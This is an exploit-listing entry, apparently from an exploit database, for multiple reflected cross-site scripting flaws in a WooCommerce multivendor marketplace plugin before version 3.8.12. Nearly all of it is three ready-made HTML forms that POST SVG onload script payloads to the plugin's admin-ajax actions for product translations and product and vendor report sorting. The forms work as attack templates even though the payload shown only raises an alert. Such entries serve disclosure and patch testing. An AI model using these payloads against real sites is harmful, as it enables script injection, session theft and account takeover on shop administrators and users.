Exploit for Multivendor Marketplace Solution for WooCommerce < 3.8.12 - Multiple Reflected Cross-Site Scripting

## https://sploitus.com/exploit?id=WPEX-ID:8F2A294A-220F-4D84-B8C0-7E3D15FCB015
With SitePress active, and with more than 1 active language:

<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php?action=wcmp_product_translations" method="POST">
<input type="hidden" name="proid" value='"><svg/onload=alert(/XSS/)>'>
<input type="submit" name="Submit">
</form>
</body>
</html>

6458 being a valid Product ID
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php?action=product_report_sort" method="POST">
<input type="hidden" name='total_sales_data["><svg/onload=alert(/XSS/)>][product_id]' value="6458"/>
<input type="submit" name="Submit" value="Submit">
</form>
</body>
</html>

16 being valid vendor id
<html>
<body>
<form action="http://wp.lab/wordpress/wp-admin/admin-ajax.php?action=vendor_report_sort" method="POST">
<input type="hidden" name='total_sales_data["><svg/onload=alert(/XSS/)>][vendor_id]' value="16"/>
<input type="submit" name="Submit" value="Submit">
</form>
</body>
</html>